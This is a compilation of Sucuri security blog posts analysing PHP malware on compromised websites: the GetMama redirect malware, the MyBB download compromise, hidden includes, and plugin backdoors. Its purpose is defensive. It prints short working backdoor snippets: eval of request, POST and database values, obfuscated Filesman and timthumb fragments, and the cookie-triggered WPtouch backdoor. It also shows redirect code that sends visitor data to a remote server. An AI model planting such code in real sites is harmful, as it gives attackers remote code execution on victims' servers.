Sucuri – Decoding Obfuscated PHP

We are happy to release a new tool for you Do It Yourself (DIY) types. Every now and then you might come across a variety of obfuscated injections in your PHP files and might find yourself wondering,

Wonder what that does?

Not to fear, Sucuri is here and we have a cool little tool that will help you take a look up it’s skirt. If nothing else this will you developers better understand how good is used for evil.

The one very cool thing about it is that it will decode as many layers as possible until it reaches a layer it is unable to decode. In our testing we have found a few strands that have gone down 20 different layers of obfuscation before it got to a point where it needed human intervention. Here is an example of 13 layers with a final output:

You can decode your obfuscated PHP here:

Backdoor Tool Kit – Today’s Scary Web Malware Reality

We often talk about the importance of keeping your server clean. You can see it in a number of our articles and presentations, this post will likely drive that point home.

This past week we came across a nice little package that we felt compelled to share with you. In it, the attacker makes use of a number of tools designed to help them infiltrate your environment. What’s likely most annoying about this kit is that it’s loaded into your environment, and uses your own resources to help hack you. That’s like being punched in the gut and slapped at the same time, not cool.

Read More

GetMama – Conditional malware affecting thousands of sites

We have been tracking an interesting malware that is affecting thousands of compromised sites. We call it GetMama!!

Why conditional? Because instead of just displaying the malicious code to all the visitors of the web site, it connects back to its command and control server to find out what to do. It also sends back to the attackers the IP address, user agent and referrer of the person visiting the compromised site, so the command and control can determine if it should display the malicious content or not.

It also only displays the malicious content once a day per IP address and only to Windows users.

Read More

MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, specially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommend these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Evil backdoors – Part II

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see on online forums people recommending to search for “eval ( base64_decode” and things like that when searching for backdoors. If you review our examples in that article, you can see that it would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

Read More

Malware on /etc/mailquota

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, they’ve been adding the following code in wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . “/../etc/mailquota”);

Read More

Website Getting Redirected? It Might Have Something To Do With Moneygram-tracking Dot Com

Have you ever tried to visit your site and you got redirected to a different site? Maybe some external news page that had nothing to do with your site? Then have you tried to visit it again to test and it worked properly?

Over the last few days we’ve been getting this question often and it means that your site has been hacked and compromised. Basically the attackers added a code similar to this to your site:

$url = “”.$_SERVER['REMOTE_ADDR'].”&useragent=”.urlencode($_SERVER['HTTP_USER_AGENT']).”&referer=”.urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,”noredirect”) === false) {
echo $answer;

Read More

ASK Sucuri: What about the backdoors?

If you have any question about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.

Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).

For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST[\'asc\'])) eval(stripslashes($_REQUEST[\'asc\']));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:


What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = “63a9f0ea7bb98050796b649e85481845″;
$color = “#df5″;
$default_action = “SQL”;
$default_charset = “Windows-1251″;
$protectionoffer = “ficken”;
preg_replace(“/.*/e”,”\x65\x76\x61\x6C\.. hundreds more lines..

Another simple backdoor, executing any code from the “php” request:

eval (base64_decode($_POST["php"]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)

return @eval(get_option(\’blogopt1\’));

A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:

>function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r’;$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:

$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H*’, ’406576616c286261736536345f6465636f646528′).’\$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb

And those are just some simple examples…


So, how to find backdoors?

Finding them is very hard, but inside Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know how the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc, etc files. We also have the checksum for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one added) and we can ignore safely the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding in the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we do our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they are a backdoor. If it is, we modify our blacklists to catch them in the future, if not, another file to our white list…

So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by your self, we recommend first overwriting all the files you can (core files, plugins, etc). Of what is left, you have to analyse manually to make sure it is clean…

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.

Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri,net/signup.

WordPress plugins hacked – Understanding the backdoor

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the team did a amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1].$matches[2]; 

What does this code do

Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific COOKIE is set, and if it is, it parses the content into the $matches variable. After that, it executes the code by calling ($matches[1]($matches[2])) ). That is possible because variable names can be called as functions in PHP (so matches1 is the name, and matches2 the argument of the function).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that is down at the moment.

Another thing to highlight, which Matt stated in the news release on, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.